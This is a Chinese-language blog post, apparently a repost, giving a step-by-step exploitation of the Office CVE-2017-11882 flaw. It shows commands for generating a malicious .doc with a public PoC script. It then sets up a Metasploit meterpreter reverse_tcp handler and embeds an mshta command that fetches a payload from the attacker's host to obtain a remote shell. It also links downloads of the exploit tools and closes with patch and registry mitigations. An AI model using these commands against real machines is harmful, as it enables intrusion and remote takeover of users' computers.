CVE-2017-11882漏洞利用


CVE-2017-11882漏洞利用

最新Office的CVE-2017-11882的poc剛剛發布出來,讓人眼前一亮,完美無彈窗,無視宏,影響Ms offcie全版本,對於企業來說危害很大。在此簡單說下這個漏洞的復現和利用過程。

 

 

POC地址:https://github.com/Ridter/CVE-2017-11882/

下載Command43b_CVE-2017-11882.py腳本文件(文末分享雲盤鏈接)。

 

使用的方法很簡單,執行下面命令,生成漏洞doc文件。

 

python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

 

 

 

使用office 2013打開,直接執行。

 

 

 

 

 

關於怎么進一步利用,可以利用msf進行攻擊。

 

這里有個小技巧,因為命令長度有43字符的限制,可以使用URIPATH設置路徑,盡量短一點,避免加起來超過43字符。

這里我仔細說一下,希望每個人都能看懂。

 

准備階段:

kali:192.168.104

win7:192.168.1.132

win7里面的doc文件可以用office打開。我的win7虛擬機用的是office2013(文末分享)

 

 

 

首先打開kali,查看 IP,可以看到我的虛擬機kali的 IP是192.168.1.104。把Command43b_CVE-2017-11882.py下載下來放kali的桌面就可以。接下來就要把PS_shell.rb文件下載下來。就把PS_shell.rb和ms17-010.rb放一起吧。

ms17-010.rb文件的路徑是:/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17-010.rb,把PS_shell.rb放smb下面,和ms17-010在一起。

准備工作做好了,接下來就是msf上場了。

輸入msfconsole,然后reload_all,重新加載所有模塊。

接下來輸入命令:search PS_shell

use /exploits/windows/smb/PS_shell

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.104

set uripath abc

exploit

會出現 started reverse tcp hander on 192.168.1.104:4444

using url,local ip,,,

mshta.exe "http://192.168.1.104:8080/abc"

 

接下來就到了 Command43b_CVE-2017-11882.py 上場了。

前面說到,我們是把py文件放 kali 桌面的,所以在 kali 執行的時候路徑要注意。

cd Desktop

輸入命令:python Command43b_CVE-2017-11882.py -c "mshta http://192.168.1.104:8080/abc" -o test.doc

會在同目錄生成 test.doc 文件。

然后復制到 win7里面用 office2013 打開。

win7 打開的時候,msf 輸入 sessions

成功返回 shell。

具體請看截圖,至此CVE-2017-11882漏洞利用結束,下面還可以進行一系列滲透了。

 

 

 

 

 

 

 

修復方案:

1.下載微軟對此漏洞補丁:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882,並且開啟自動更新功能

2.在注冊表中禁用該漏洞模塊

reg add "HKLM\SOFTWARE\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\XX.X\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD/d 0x400

 

 

 

Command43b_CVE-2017-11882.py:(鏈接: https://pan.baidu.com/s/1hslbc80 密碼: 5ap6)

PS_shell.rb:(鏈接: https://pan.baidu.com/s/1gfF5jmN 密碼: rkwy)

office2013:(鏈接: https://pan.baidu.com/s/1eSElsrC 密碼: q66f)

本文鏈接(http://www.cnblogs.com/Oran9e/p/7880832.html),轉載請注明。

任重而道遠!


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM